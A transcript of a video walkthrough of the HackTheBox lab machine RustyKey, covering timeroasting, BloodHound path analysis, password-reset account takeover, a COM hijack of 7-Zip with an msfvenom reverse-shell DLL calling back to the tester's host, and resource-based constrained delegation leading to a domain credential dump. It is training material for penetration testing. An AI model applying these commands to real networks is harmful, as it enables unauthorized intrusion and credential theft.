HackTheBox - RustyKey
Key Takeaways
The video walks through the HackTheBox machine RustyKey, using tools and techniques such as nmap, BloodHound and Kerberos authentication to gain access to the system and escalate privileges. The attack chain exploits weaknesses in Active Directory, relies on collectors like SharpHound and RustHound to map them, and leverages techniques like COM hijacking and resource-based constrained delegation.
Full Transcript
What's going on YouTube? This is IppSec doing RustyKey from HackTheBox, which I find to be a very well put together Windows machine that has a nice balance between Active Directory and general Windows exploitation. We start off with a set of credentials, which in reality we don't need because the first step is a timeroasting attack, which doesn't require authentication to steal computer account hashes. However, without that previous access, it would be a complete guessing game to do the timeroast attack. Once we get access to the computer account, we discover a path that lets us take over user accounts through adding ourselves to a group and changing the password. But there's a few tricks. Firstly, NTLM authentication is disabled, so we have to use Kerberos. And secondly, the users are in the Protected Objects group, which blocks a lot of our tools from working. Thankfully, we have the right to remove users from this group, which allows us to continue onto the box, where we find a PDF that indicates we have to perform a COM hijack on 7-Zip. However, the user that has access to the registry key is denied remote login rights. So, after doing the same takeover we did previously, we use a tool like RunasCs to switch to this user. After the COM hijack, we gain access to an account that can perform resource-based constrained delegation to get root. There's a lot of cool things, so let's just jump in. As always, we're going to start off with nmap. So, -sC for default scripts, -sV to enumerate versions, -vv for double verbose (this gives us things like the TTL), -oA to output all formats in the nmap directory and call it rustykey, and then the IP address of 10.10.11.75. This can take some time to run, so I've already run it. Looking at the results, we have quite a few ports open. Looks like 11, because we have 989 there. And the first thing I see is DNS on port 53. The banner says Simple DNS Plus, and this is the default banner of Active Directory.
So I always scroll down and confirm. Yes, AD is installed, and it's giving us the domain name right here. So let's go ahead and copy this and then do sudo vi /etc/hosts. We're going to add this to our hosts file: 10.10.11.75 rustykey.htb. And now there's something that is somewhat unique here. I'm used to seeing a lot more information. Normally LDAP has like an SSL certificate, especially if Active Directory Certificate Services is installed, and then you'd see like rustykey-something-CA as the certificate authority. We're not seeing that here. Let's see. This can be a little bit of a spoiler, but let's just go back to an old box. Let's say Certificate, and then we can do nmap on Certificate. And we see this information, right? We have a bunch of SSL. We can get the hostname from it. So there's a lot of information here when Certificate Services is installed. We're not getting that on this box. So most likely AD is just a vanilla install and not much customization has happened. Let's see what other ports we have. Kerberos, that's not surprising. 445, this is going to be SMB, LDAP, and that's about it. Looking at the scripts, we can see there is an 8 hour clock skew. So if we want to do any Kerberos related things, we have to make sure we set our time correctly on this box. This is an assumed breach box, so we will start out with a set of credentials. But before we get to this, let us just quickly run NetExec. And I'm going to get the hostname of this box because I always like adding that into my hosts file. So I'm going to do nxc smb 10.10.11.75. And this should be able to give us the hostname, which is just DC. So let's go ahead and add this to our hosts file. So we can do dc.rustykey.htb. And then, I guess, let's generate a krb5 file, a Kerberos file.
This is something you should always do on Active Directory machines because it helps your Linux machine talk to it if you ever want to do tickets, right? So I'm going to do --generate-krb5-file. I want to say I'll call it rustykey.krb. And let's see. I just want to look at this real quick because I did specify the IP address here. I know in old versions of NetExec you had to use the hostname because it would just put the IP address in this krb5 file. But it looks like it's correctly pulling everything, right? I see admin_server as the DC and that's what I want to see. So let's do a sudo cp rustykey.krb /etc/krb5.conf. And let's see, what else do we want to do here? We can probably start off with testing our credentials. So I'm going to go back to my nxc command and then we can do a -u. Looks like I already overwrote it. Oh, nope. There we go. There it is. And we can do -p. And I'm going to put the password in quotes because we have some special characters there. So this is just going to tell me if our credentials are correct. We get STATUS_NOT_SUPPORTED. So I'm guessing NTLM is disabled, but we can just add a -k, and this is going to do a Kerberos authentication. And hopefully this works. We get a clock skew error. So let's do sudo ntpdate 10.10.11.75. This is going to sync our time to the box. If you do this and your time goes immediately back, you probably have time sync enabled in your VM. So go into VirtualBox or VMware and disable time sync there, because open-vm-tools is just overriding what you're trying to do. But now let's go ahead and run this again. Third time's the charm. Hopefully we get authenticated here. And yes, there we go. So we have authentication. We could try some things like --shares to see if there's open file shares on this box, but in reality, the thing I normally do is just run RustHound from here. So I'm just going to do rusthound. Let's go up here.
I want to say we want to do -d rustykey.htb -u r.parker -p. And this may be all we need to do. I'm blanking on all the flags, but I want to say this is good. Yes, it is. We are connecting and we're getting a bunch of data. Awesome. So I'm going to go ahead and start up BloodHound. I have it saved in /opt/bloodhound-server: docker compose up -d. We do our ls. We have the JSON files. So we should be able to go to localhost:8088 in probably like 15 seconds and then get access to BloodHound. Uh-oh. My box has completely frozen. I'm not sure what to do here. Oh, there we go. It's coming back. It's still waiting for the graph DB to start. I'm probably going to pause the video and we'll come back when it comes up. Nope. There we go. Awesome. So we can just do admin and then please subscribe. I think one exclamation point is my password. Maybe exclamation point one. There we go. We get logged in and we want to upload the JSON files. So let's go to HTB. Where is RustyKey? There it is. Copy all these JSON. Upload, and administration. It is ingesting. And this is going to take a minute or two to ingest. So I'm just going to pause the video and we'll come back when this is all done. Okay, we have all the data ingested. So let's go over to Explore. And if we run a bunch of these pre-built Cypher queries, we really don't see that much. Looking at domain admins, we only see one. That's a bit odd. I expected to see like two because there's two domain admins here. Let's see. Is there a shortest path to domain admins? Shortest path trusted. There we go. Shortest path to Domain Admins. Let's look at this. And what do we see? There we go. We have backup admin that is a member of Enterprise Admins that has generic rights over Domain Admins. So maybe because Enterprise Admins isn't a member of Domain Admins, that's why it's not showing up. Yeah. I'm guessing that's why. I wonder if that query should end in... No, we have owner SID 512.
I'm confused real quick. If we go back to this one Cypher query, where is it? All domain admins: we see objectid ends in 512 and we're a member of Administrators and this ended in 512, right? Oh, this ends in 544. Let's see, what if I edited this? Maybe this is the better way to show domain admins. I don't know. But here we can see now Domain Admins and Enterprise Admins. I'm not sure if that's correct, but hopefully start playing around with BloodHound and understanding these things because it's a really powerful tool. A lot of the default things just don't really get you anywhere, right? Let's go over to the search. What user do we own? Because this is the assumed breach box. What user did we run this with? r.parker. So this is also normally where I start. I go to my user. We look at them and let's see, we go to outbound control. We have nothing there. We can add to owned. Oh yeah, add to owned. And then we can do shortest path. And then what is it? I'm trying to search for shortest paths from owned. There we go. Run this. And all this shows is we're a member of Domain Users that has users. So we really don't have any information in BloodHound. Now, one thing you can do that's really handy, especially in CTFs where the Active Directory environment is small, is just look for all edges that have unique things set about them, right? So if I do a MATCH and we change this to the source with a relation to a target, and then we want to show sources that are computers or sources that are users. If we did groups, it will get very, very messy. It's even going to get messy here. If I just do RETURN p, we're going to see a lot of data here. And that's because every user and every computer object has this MemberOf property, right? So what I'm going to do is filter this out. So we're going to say AND type(relation) is not MemberOf. And I think I have to do that. And now we have something very simple.
We have IT-Computer3 is a member of HelpDesk. If we look at what HelpDesk can do, if we go to outbound object control, HelpDesk has ForceChangePassword over ee.reed, we have GenericWrite and ForceChangePassword over dd.ali, and we have some more ForceChangePasswords over users. If we look at one of these users, let's go with gg.anderson, we can go to member of. We see Protected Users, so we can't do some authentication mechanisms, but they're also Remote Management Users, right? If we look at this group to see who's a member of it, click on the members of this. So all these users can probably WinRM into the system. So these are the users we want to get to, and the IT-Computer3 object actually had a path, right? IT-Computer3 had AddSelf over HelpDesk. Now the question is how can we compromise this, right? With computer objects, there's really two ways that you can easily compromise them. The first is if they have that legacy thing, if they're really old or a member of like Pre-Windows 2000 Compatible Access, it's possible their computer name is going to also be the password. I forget exactly what box we used that on. I want to say it's Vintage, but if you go to ippsec.rocks, that will show it. But if we look at member of, it's only Domain Computers. So that's probably not going to be the case. Now there is one other thing that is very interesting about this box. If we look at password last set, we see it is December 27th, 5:40. Now if we look at when this was created, where is the creation? That's password last set; it's created December 26. So this is a one day difference, right? Computers in Active Directory should change their password automatically every 30 days. This was only changed one day later. So this is probably going to be a user-set password, which means it is weak. If we look at any other computer object, I'm going to go, let's say, IT-Computer3. Oh, that's the one that this is.
Let's do IT-Computer2. We can see it is created December 26 and the password last set is December 26. So this probably has the autogenerated password, but IT-Computer3 doesn't. And what makes this interesting is there is a timeroast attack you can do against computers which will let us get the password hash, essentially, of it. And NetExec has something for us that we can use. So I'm just going to do NetExec. Let's go back to nxc. And we're just going to do the module timeroast. I think that's all we need to specify. And there we go. It's going to start timeroasting and it's going to just brute force everything with a RID brute. And then we get potential hashes here. So what's happening is we're sending some weird NTP thing to a computer object and it's responding back with, I think, a pre-authentication ticket or something like that that then is hashed with the NTLM of the computer account. And since it's hashed with that, we can potentially try to crack it. Or maybe the time is encrypted with the hash. I forget exactly how it works. I'm sure if you Google timeroast Active Directory, you can get some information about it, but typically with a lot of Kerberos tickets, I want to say it is the current time that is hashed with the NTLM hash of the account. And that's generally why you can crack Kerberos tickets, right? So I'm going to copy all of these hashes. And then we're going to go over to the Kraken. This is just where I have hashcat. And if it doesn't automatically crack this, make sure you update hashcat because this is a relatively new technique. I want to say within the last year. So, open hashes/rusty-time. And I'm going to paste all of this. And then we also, I just realized, have to filter this out. If I do, let's see, if we had it, we want one, two, three, four, five. So I'm going to say awk print $5. I'm just going to copy that to t and we can move t over top of our thing. And now we just have a hash file of everything.
And then this number here, this is going to be the RID of the computer account, which is a username essentially. So when I try to crack this, I'm going to give it the username flag. So when it cracks something, I can go back and see which hash that correlated to. So let's go ./hashcat, paste in the hashes, then /opt/wordlists/rockyou.txt, and it should automatically detect this. So let's see. I said we had to and I didn't: specify --user so hashcat knows we added the username. And there we go. One has cracked really quickly. So I'm just going to do --show now. And we see 1125 is Rusty88!. So if I go back over to BloodHound and I search for 1125, IT-Computer3 comes back, and that is because it has that SID, right? We can see that here. So IT-Computer3 has now been owned. We have the password. I'm going to go and add this into creds.txt. So we can say creds.txt: IT-Computer3, what was it? It was Rusty88!. I want to say Rusty88!. I hope that's right. Cat it. Let's do nxc smb 10.10.11.75 IT-Computer3 Rusty88!. Is that going to crack? STATUS_NOT_SUPPORTED. Kerberos, because NTLM is disabled. Please authenticate. Yes, it does. Awesome. If we had an invalid password, it's going to say not valid, right? Yes. So we have successfully cracked that IT computer account. So this had AddSelf over HelpDesk. And then HelpDesk had a lot of edges. And I do want to call something out here. If you ran RustHound pretty much just before today or yesterday, it would not find these edges. There was actually a bug in RustHound that me and 0xdf had fixed. So if we went to Google, let's go GitHub RustHound. Go here, go to the issues, let's go and also look at closed issues. You can look at everything here of what went on, but a lot of changes went into RustHound very recently to add this.
If you were just solving the box and ran into a wall, I would recommend running another tool. In this case, you'd have to run like the BloodHound Community Edition and that would also get this flag. So if you ran both RustHound and the BloodHound Community, then you'd see this edge. If you just ran RustHound, it wouldn't work. SharpHound is by far the most accurate collector. However, it has to be run from Windows. And at this point, we don't have a shell on the box, so it becomes a little bit of a pain to run RustHound. But again, big thanks to 0xdf. You can look at his issue here, where he used Claude in order to automatically fix this, which was pretty cool. But yeah, make sure you always keep your tools up to date. And that's another good thing about just solving boxes. If you're looking to get a bigger name for yourself, you'll find a lot of bugs just in tools that then you can go back to the creator or try to fix them yourself and then make the open source ecosystem better. But I'm going to get off my soapbox now and let's go back to looking at this path, right? We said gg.anderson was a member of WinRM. Actually, I think all of these users may be. If we looked at bb.morgan, one thing sticks out here. No. gg.anderson, I think one thing sticks out. That user, man, there we go, is disabled. We see enabled: false. So bb.morgan is enabled. ee.reed, if we look at what they're a member of, they are a member of users. So they're a member of Support as well. So we want to go either to the bb.morgan or ee.reed user. The other thing you could just do, if we now go to IT-Computer3, actually we already marked them as owned. So I bet if we did shortest paths from owned principals it becomes a lot more interesting, right? Owned objects. Run it. Here we go. So we can see IT-Computer3 member of HelpDesk, ForceChangePassword.
I'm surprised it doesn't have like Windows remoting and then WinRM to the DC. A little bit surprising, but not that much, I guess. Let's see, what else do I want to call out? I know there's one other thing that I just can't seem to remember. Oh, we have, let's see, if we go back to HelpDesk outbound object control, we do have GenericWrite over dd.ali, right? So we can force password change and change principals or attributes in their Active Directory account. Now, this is mainly useful, I think, for like some ADCS attacks. I want to say it's 9 and 13 where you can change the UPN and that allows you to impersonate users. Also in a recent Insane box we modified the UPN, created a ticket so the Linux box that authenticated with AD would trust the UPN, and then that allowed us to impersonate a user. I don't see Linux boxes and ADCS was not installed to my knowledge. So this GenericWrite, I don't really know what to do exactly with it, but it's just something to keep in the back of your mind. If you want to know more about those attacks, just go to ippsec.rocks, type probably UPN, and it'll bring up boxes related to that. But let's go ahead and do the attack to get into bb.morgan. They're enabled. Yes. So let's go pathfinding IT-Computer3 to bb.morgan and we can show this attack, right? So they have AddSelf, ForceChangePassword. Awesome. So let's see this. I'm going to go and use bloodyAD. So we'll do bloodyAD -d rustykey.htb --host dc.rustykey.htb. User is going to be IT-Computer3. And then the password is going to be Rusty88!. And then we want to add the -k for Kerberos. And I'm going to do add, and then we want to do groupMember, and we want to add ourselves to HelpDesk. So HelpDesk, and then the principal is going to be IT-Computer3. So we're adding ourselves into the HelpDesk group. Let's see. There we go. We have been added and now we want to change the password of a user.
I want to say that is going to be set. And we can just do password. The target is going to be bb.morgan. And I'm going to set bb.morgan to PleaseSubscribe!. Password has been changed. So let's do a getTGT to get a Kerberos ticket for this user. So we can do getTGT. What is it? rustykey.htb/bb.morgan and then the password PleaseSubscribe!. And we get this KDC error: KDC has no support for the encryption type. And if we look at bb.morgan, they are a member of Protected Users and Protected Objects. Now, Protected Objects will prevent a lot of just basic attacks. Maybe it's Protected Users. Let's see. Protected Objects Active Directory. I'm going to go to Google because I like their search results better. What does it do? And I'm going to add some keywords. It protects against a lot of like credential theft. It prevents you from having very long TGTs, so we can't get TGTs longer than 4 hours. Prevents a lot of delegation. We can't use DES or RC4 encryption types in Kerberos pre-authentication. And we can't use NTLM authentication. So those are the main things it does. And in impacket's getTGT, if you specify the password, it's going to use RC4. So that is why we can't do this. Now one thing I would generally do is I would switch and use AES authentication, and you can generate the AES keys if you know the password. So let's see, AES key generation Python GitHub. Can I find this real quick? Yes, this is another thing that would be great if it just got imported into impacket, because if we look at the getTGT options, there is no way to use an AES key if you just specify the password. So we have to generate this AES key manually. So go here. Let's do python3 -m venv venv. And again, this is not going to work because I don't think AES is configured on the box, but I do want to show this type of stuff because these are the paths I would generally go down, right?
So we can do source to activate it. Let's do pip3 install requirements and then we do python3 aesKrbKeyGen. We need to specify the domain, which is rustykey.htb, the user, this is bb.morgan, and then the password is PleaseSubscribe!. Right. And there you go. It gives us the salt and then we get an AES key. So if we try this, where was my getTGT? Let's get rid of the password. I think it's -a. Yes, but let's do a --help. -aesKey. We still get no support, right? So AES did not work here. We don't know exactly if it didn't work or we did something wrong. We can kind of confirm we did something wrong by doing a user that we have. And if you use the user you start out with, because it's assumed breach, it's still not going to work. I want to say it needs like pre-authentication. So I'm going to use the computer object and we can get something different. So let's do -user IT-Computer3 and the password was Rusty88!. And then there's also a flag if you're doing it with a computer object, the -host, because AES keys for computer objects are salted slightly differently, right? We want to add -host IT-Computer3 and then the fully qualified name. So the salt is done a little bit differently. I'm going to copy this. And now let's go back to getTGT. Going to give it this AES key. And the host is going to be IT-Computer3, and no support for this encryption type. If I change a single thing, so I change that B to a C, pre-authentication failure. So we know that it's passing pre-authentication with this AES key. So we generated it correctly and then the error is coming, right? If you don't have pre-authentication enabled, so this can be any non-Kerberoastable user, you'll never get this message and you'll always just see this error message. So you can't confirm you generated the AES key correctly. But with computer objects, we're able to do this. So let's see.
This was a big dead end, but we do have the ability to remove that bit. So if I do bloodyAD, let's see, -d rustykey.htb, let's just do it like this, and instead of set password what we're going to do is remove groupMember "Protected Objects". Insufficient access. I bet this is because it removed us from the group. Run this again, add it to the HelpDesk group. Run it. And there we go. We have removed that. Let's see. Let's set the password again. Okay. And then I'm going to now do a getTGT. And we save the ticket. Right. So because we removed the Protected Objects from the user, now we can do RC4 authentication and get the TGT. We could also validate this by doing a describeTicket bb.morgan.ccache. And we can see, where is encryption type? There we go. Encryption type is RC4-HMAC, etype 23. So again, because it was in the protected users, it was refusing to give us this ticket. But because we removed the protected user, that's why I could get this ticket. Now, the one question you should be asking is how I knew I could just remove users from that Protected Objects group. And honestly, I don't see it in BloodHound. I'm pretty sure when I was solving this box, I did see it. And that may be because I ran multiple BloodHounds. So I want to say the HelpDesk did have a permission that I'm not seeing. Let's see, outbound. We only have all these ForceChangePasswords. If I go to Protected Objects, let's go to inbound control. Let's see. I don't see much. We could go back to bloodyAD. I'm going to make sure I'm in the group and then I'm going to do a get -h. Let's see. We want to do get writable. This is always good to run when you start getting into dead ends. And we can see we have write access to Protected Objects. So why did BloodHound not show this? I'm actually going to run the Python ingestor. So let's do nxc ldap dc.rustykey.htb -u r.parker -p password.
Let's go ahead and grab this. Paste that. We can give it the --bloodhound flag, Kerberos, collection all, DNS server is 10.10.11.75. This should now write everything we want. It's going to take a little bit to run, but this will get us a zip file. We'll upload it to BloodHound and then look at our permissions again. So I'm debating if I want to just pause the video right now because it's looking like it's taking a little bit of time to do this. So yeah, I'm going to pause the video and I'll resume when this is done. Oh, as I was about to go pause it, it finished. So no need to edit there. Let's go ahead and move this object into a directory. Go back to BloodHound administration. Upload files. And I wonder if that's going to be one of the files that failed to ingest. That could also be the case. I know there's a bug with that. Older versions of BloodHound process it, but the newer versions don't. I want to say some value is blank, which is causing a validator to fail. It's something silly. So we have this upload is done. It is ingesting. Let's see, that would probably be, we'll see what edge it is. It is complete. So I can go to Explore. Let's now go back to the HelpDesk. What outbound permissions do you have? Are you going to magically show up? I see five now. There we go. Oddly it's just showing AddMember. There are other edges to this. So let's go inbound control. Do we see this HelpDesk? So it's not showing we have write. It's just showing AddMember, which is equally as interesting. But this is an indication that something can happen there, right? Make sure the computer's not there. Yeah. So it always helps to run multiple BloodHounds, I guess. Let's go ahead and progress, right? So where was I? We ran BloodHound. We got a TGT. We're the user, right? So I'm going to do KRB5CCNAME is equal to the TGT that we have got.
Then we can say evil-winrm -i dc.rustykey.htb, the realm is rustykey.htb, and if we just look at the files here, we don't have much. I want to say, is it tree /f I'm used to running? Yeah, we have an internal PDF in Desktop. So let's go to Desktop and then I'm going to download internal.pdf and we'll see what this file is. So I'm going to open internal.pdf and we get a memo. So, as part of a support utilities rollout, extended permissions access has been temporarily granted to allow testing and troubleshooting. This has mainly helped to streamline ticket resolution related to extraction compression. So probably some type of zipping, by the finance and IT teams. Some registry level adjustments are expected during this phase. Let's see what else we have. Unrelated. The permission change is logged and will be rolled back once the archiving utility is confirmed stable. Let DevOps know if you encounter anything. Did I miss any keywords? Oh, there we go. Some newer systems handle context menu actions differently. So this is going to be related to like COM objects and CLSIDs. You want to do some googling around this to understand exactly what's going on. I'll explain it once we get a little bit further, but the thing we have to do is switch over to... I don't think we actually have to yet. I was gonna say we have to switch over to the Support user, but I don't see anything in here that's telling me Support has a unique permission. So I'm gonna keep going full steam ahead as this user and then switch over to Support when something tells me to. So let's see. We're bb.morgan. They were talking a lot about archiving utilities, right? So I'm going to go cd progra~1 because I hate typing like Program Files and Program Files (x86), and oh man, that crashed. progra~1. There we go. I go into Program Files and we see 7-Zip is installed. So that's probably the archiving utility they're talking about. We do a dir.
I don't see anything. So I was looking for like WinRAR and things like that, but I just see 7-Zip. The other thing it's talking about is the context menu thing, and that relates a lot to COM, which is the Component Object Model, and essentially that enables Windows programs to share functionality, right? So for example, 7-Zip: it's likely that we want Explorer or a file browser to be able to go into 7-Zip files and it treats them like virtual folders, right? You've double clicked a zip in Windows and it's just gone into that. How that works is there's a COM object that points to, like, this type of file uses this DLL. So when Explorer clicks it or another program tries to open it, it's going to use that DLL in order to process it, right? So that's the whole purpose, I think, around COM objects and things like that. And that all works under CLSIDs. I forget exactly what that stands for, but let's go ahead and query the registry for CLSIDs that have zip in them. So I'm going to do reg query and then HKCR, this is HKEY_CLASSES_ROOT I believe, and then CLSID. And we're going to search for zip. And this should take probably another 5 to 10 seconds to run. I didn't remember this taking a while. But it looks like it may, because I typed it wrong. It's reg query, not rec. So let's just copy and paste this. There we go. And whoops. These are all the CLSIDs that have zip, right? And here is 7-Zip's. One right here. So we can see this CLSID is going to use 7-zip.dll. And if I wanted to, we could look at the permissions of this. So I'm going to copy this. And then we can use PowerShell's, what? Get-Acl command. And then in most registries, you can just do like cd, let's do HKCU: for example. And this is going to do a like weird virtual drive. And now we're in the HKEY_CURRENT_USER thing. There is no one for HKCR.
You can do a New-PSDrive and create one, or you can just reference it a slightly different way. I'm going to do it the slightly different way. My hands are on the wrong thing. So we'll do Get-Acl and then what is it? It's going to be Registry::HKCR. And let's see, we don't need HKEY_CLASSES_ROOT like that. I think this is it. So if we do this Get-Acl, let's do a Format-List. There we go. This is 7-Zip's CLSID and we see that Support has FullControl. So in order to modify this registry key, we want to become the Support user. And going back to BloodHound, let's look at Support. Look here. Let's see. Members: ee.reed is a member of Support. So we want to do the same exact attack except now we want to take over ee.reed. Let's see. Do I have bloodyAD commands here? Yep, I do. So let's do the add command again to make sure we're in IT-Computer3. We already are. That's good. So now we should be able to set the password of ee.reed. And then we also want to remove Protected Objects. And ee.reed is in Support, not in IT. So we're going to remove it from Support. And now we should be able to use the getTGT command again, right? So let's do ee.reed and we have the ticket. So let's do now a KRB5CCNAME ee.reed and log in. We get some weird error. Invalid token was supplied. Try it again and we keep getting it. And I even tried switching over to devious-winrm. Let's see. We can do -k, username ee.reed, password PleaseSubscribe!. I did Kerberos. Need a realm, right? Yeah. dc.rustykey.htb and then we'll give it the target. I think this is all we need. And even this fails, right? Maybe it's not fully qualified. Nope, it is. So the next thing I tried was, let's try NetExec. So we can do nxc smb 10.10.11.75 ee.reed, password PleaseSubscribe!, Kerberos, and STATUS_LOGON_TYPE_NOT_GRANTED.
So ee.reed is definitely a member of Remote Management Users, but there's some permission that is blocking remote access for ee.reed. So they can only do local login, which sucks for us because that's what's preventing us from doing WinRM. However, since we have a shell as bb.morgan, we can upload RunasCs and then switch over to this user with a local user context. So, that's what we're going to do. If I remember, I'll show looking at secedit to look at this SeDeny remote-access right for the specific user. But let's go ahead and go back to bb.morgan, and then I'm going to go into ProgramData because this is where I like just writing files to on Windows. Let's copy /opt/collection. What is the next folder? NetFramework 4, let's do 5, and then RunasCs. Do RunasCs.exe. And now we can, actually, let's put it in www so we can easily copy it. And then we can do a wget http://10.10.14.8:8000/RunasCs.exe -OutFile RunasCs.exe. Start a web server. And I know you can also use the upload command in evil-winrm, but I just find it works better with wget, because I think what's going on under the hood there, it converts the file to base64 in chunks and then un-base64s it on the console, writing to a file. It's messy. I find this to be much more reliable with just doing it over web. Let's make sure we copied it. We did. Awesome. So let's say ee.reed, password was "please subscribe". We'll put these in quotes. Let's do powershell, -r 10.10.14.8:9001, rlwrap nc -lvnp 9001. Does this load? There we go. Awesome. So now if I do whoami, I am the ee.reed user, which means I'm going to be able to modify that registry now. Let's see, where was it? I want to get my Get-Acl command so we can put this on a clipboard, because we're definitely going to need it. But first, we need to get us a DLL that will send us a reverse shell. So, I'm going to use msfvenom for that.
So you do msfvenom, payload is windows/x64/shell_reverse_tcp, format is dll, let's call it rev.dll (DLL, not Dell), LHOST=10.10.14.8, LPORT=9001. That should do it. As a reminder, if you did shell/reverse_tcp, that's going to be a staged one. So it's going to reach back to you expecting more DLLs to go ahead and inject. This is the much better way to do it for Hack The Box machines because you don't have to run a Metasploit handler to get the reverse shell. So there we go. We have the DLL. Let's copy it to www. Let's cd into ProgramData. Start a web server back up. wget http://10.10.14.8:8000/rev.dll, we'll call it rev.dll. There we go, we have downloaded it. So now what we want to do is a Set-ItemProperty to write that registry key, and that's the key we're going to write because that's what pointed to 7-Zip. I bet if I do, was it, Get-Item, we can see InprocServer32, the property (default), it's pointed there, right? So we want to do a Set-Item and then we want to change the name (default) to the value C:\ProgramData\rev.dll. Set-Item couldn't find name. Is that case sensitive? Let's do capital V. Am I specifying something wrong? The Set-ItemProperty. There we go. Not Set-Item. Set-ItemProperty. I thought it would truncate the name, but I guess it didn't. That's not dying. Let's kill that pane. nc -lvnp 9001, rlwrap. Let's do that Get-Item again to make sure it is set. So what we're doing now is waiting for a user on this system to open up a 7-Zip file. And if we did everything correctly, when they try to open up 7-Zip or open up the archive, it's now going to load rev.dll, which is going to send us a shell. And hopefully I did the msfvenom command correctly. Maybe we should have tested that before doing this. But I'm just going to give it, let's say, two minutes. Oh, as I was talking, we got a shell. Awesome. So, let's do whoami /all, and let's see. Let's just do whoami.
So, we are mm.turner. So, let's go here and look at mm.turner, and let's see, a member of: we are a Delegation Manager, and I should have just looked at outbound control. We can see mm.turner is a member of Delegation Manager, which is AllowedToAct on the DC. So this is essentially going to allow us to set up RBCD, resource-based constrained delegation. And I'm pretty sure we also have videos that talk about this. So I definitely recommend watching one of these videos. Maybe Vintage is a good video, because in that one we abuse the pre-2k authentication to log in as a machine account with the hostname, and then we do resource-based constrained delegation at the end. So, that's another good one to watch. But we're going to perform this attack. And the easiest way to do it is, let's see, we have to find a user we want to delegate, right? And if we look at Administrator, I don't think we can use Administrator. Let's see. I think it's because it's marked sensitive. Do we have a delegate flag? Trusted for constrained delegation: false. The other user we saw was backupadmin, right? If we look at backupadmin, let's see, are they marked as sensitive? False. Trusted, false. There's something set on the Administrator that blocks it from doing it. Let's do Get-ADUser Administrator -Properties *. Oh, I'm not in PowerShell. Get-ADUser Administrator -Properties *. Do we have anything about delegation? It's not trusted. AccountNotDelegated. There we go. So, that's what's going to prevent us. I know BloodHound shows it somewhere. Let's try backupadmins. What was it? backupadmin. Yep. AccountNotDelegated is false. So that's what's going to enable us to do delegation here. And on previous boxes we did this from Impacket. We don't have our user's password. So it's going to be hard for us to use Impacket for this. However, we can just do everything from PowerShell, right?
All we have to do is Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3. And for this to work, we just need to know the computer password for this, right? And in a lot of the attacks, we're just using our ability to create computers, because when we create a computer, we can specify the password and then we can create service tickets manually. We don't have to create a computer account in this case because we already know IT-COMPUTER3's password. So we do this, and now if we do a Get-ADComputer DC, I should have done this before, is it PrincipalsAllowedToDelegateToAccount? I want to say, let's see, we can see IT-COMPUTER3 is allowed to delegate. So this means IT-COMPUTER3 can now create Kerberos tickets that the Rusty Key domain is going to trust. So, to wrap this all up, we can finally exit here. Let's do a getST, for get service ticket, and then rustykey.htb/IT-COMPUTER3. And that computer account's password is rusty8!. And then we're going to give it the Kerberos flag. We also have to give a service principal name. We'll do CIFS. That's going to enable us access to SMB. So rustykey.htb, and we're going to impersonate backupadmin because that was also an administrator on this box. So now we have this ticket. So let's just do a secretsdump. Let's do KRB5CCNAME equal to that, secretsdump, and then rustykey.htb. Is this all I need? STATUS_NOT_SUPPORTED. Let's see. Do we still have it? We're still allowed. It's probably my secretsdump command that is wrong. I thought it would pull a lot of information from the ticket, but maybe it doesn't. Let's just specify the full thing. rustykey.htb/backupadmin@dc.rustykey.htb. Let's specify -no-pass. There we go. This looks better. So now we're going to start grabbing all the hashes for the accounts, and we should be able to log in with the Administrator account. There we go.
We have the local SAM for Administrator. We're just going to copy this and see if we can log in. Maybe Administrator is a protected account and we can't just use this NTLM willy-nilly, but I'm not positive about that. So let's do nxc smb 10.10.11.75 -u administrator -H, I think -H is for hash, is that right? STATUS_NOT_SUPPORTED. Kerberos. KDC principal unknown. So I don't think we can. That's also the local Administrator. I'm not sure if that includes the domain account. So maybe we'll get a different hash for this Administrator, or we'll just have to remove Administrator from Protected Objects and then we can log in as them. We'll figure it out in a second. Is that the password? Did we just get the password this way? Rusty, RC4. Where did default password come from? I have no idea where this came from, or how they set it. Let's see. Definitely need -k. KDC principal unknown. Looks like Impacket crashed on me, but I think we got to the Administrator hash. And this definitely does look slightly different, right? So we have, this one began with F7A, and up here this began with E3. So the difference is this is the local database. When you make a domain controller a member of the domain, then it avoids using the SAM for local login and switches over to NTDS.dit. So let's now try NetExec again. We'll specify this hash, and does it let us in? Principal unknown. Administrator. That is correct. Actually it was not correct. Administrator. Let's do this hash. And come on, say Pwned. There we go. So, yeah, it helps if I type the name correctly, right? I should have known from the error message we were getting, the unknown principal, right? KDC principal unknown. That's telling us it doesn't know administrator. If we gave it an invalid password, this is going to give us something different, right? Pre-auth failed. So it helps to be able to read error messages, right?
Because that was telling me right there that I made a typo in the username, and these are the things that you just get from experience. Making typos in usernames is something that happens all the time to almost any red teamer and pentester, right? Being able to recognize the error that's telling you you did that, that is something that just comes from experience. So let's see, now we should be able to just get a shell. I'm going to use psexec. So, we'll do administrator. I bet that Rusty Key password worked. This one. So, nxc, administrator. We could have done psexec with the NTLM hash, but let's just see if the admin password works as well. It does. Awesome. So, let's do psexec.py -k rustykey.htb/administrator@dc.rustykey.htb. Requesting shares, uploading, and come on. There we go. So we can do type \Users\Administrator\Desktop\root.txt, and there we go. We get that hash. That definitely did not clear the screen. But the last thing I wanted to show is just doing a secedit to export a lot of local policies and then showing the deny logon right for ee.reed. So let's do a secedit /export and we're going to write it to C:\ProgramData\secpol.cfg. And this is something I just asked AI to do. So it's not something I have memorized. I was just asking how do I look for the deny logon right privilege, I think is what I asked, and this is what it told me. So we can type this file and then do a findstr on ee.reed, I think. Oh, we're in, I thought that was it, in command prompt. Let's just switch over to PowerShell. Is my shell wonky? Hopefully this still works. cat secpol.cfg and we can Select-String ee.reed. Doesn't look like we got anything there. We can try looking at the group the user's in. So let's paste this and then type support. I wonder if Select-String is case sensitive. Looks like we're getting some things. So, let's see. Here we go.
